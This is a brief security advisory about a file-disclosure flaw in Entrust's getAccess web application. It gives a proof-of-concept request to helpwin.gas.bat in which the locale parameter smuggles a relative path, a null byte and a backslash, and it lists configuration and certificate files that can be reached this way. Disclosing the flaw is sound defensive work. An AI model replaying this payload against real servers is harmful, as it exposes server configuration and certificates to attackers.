COMMAND

	getAccess

SYSTEMS AFFECTED

	getAccess

PROBLEM

	Rudi Carell (www.owasp.org) says :
	

	

	\"getAccess[tm]\"  (still)  uses  default   shellscripts   which   start
	java-classes for their web-applications.
	

	Due to missing input-validation  it  is  possible  to  read  files  with
	getAccess s permissions on the  \"getaccess\"-machine.  (only  works  in
	combination with other input fields as described  below)  in  connection
	with  config-   and   other   files   this   can   lead   to   a   total
	server-compromise(dont ask me how:-).
	

	 POC-Example:

	 a HTTP-request to:

	 

	http://getAccessHostname/sek-bin/helpwin.gas.bat?

	

	with the following parameters:
	 

	mode=

	&draw=x

	&file=x

	&module=

	&locale= [relative FILE/PATH] [Nullbyte/0x00] [Backslash/0x5c]

	&chapter=

	

	... will lead to disclosure of [FILE/PATH]
	

	Config-Filelist(depends heavily on config .. and can be found 2  trav  s
	back [../../]):
	

	

	/config/acl-runtime.conf

	/config/administration.conf

	/config/applist.conf

	/config/authmethod.conf

	/config/clientCert.conf

	/config/connection.conf

	/config/directories.conf

	/config/domainAuth.conf

	/config/hook.conf

	/config/license.conf

	/config/log.conf

	/config/login.conf

	/config/misc.conf

	/config/pmda.conf

	/config/redirection.conf

	/config/registry.conf

	/config/serverCert.conf

	/config/serverConnection.conf

	/config/source_systems.conf

	/config/version.conf

	/config/serverReq.pem

	/config/serverCert.pem

	/config/certs

	

SOLUTION

	Patch posted on Entrust web site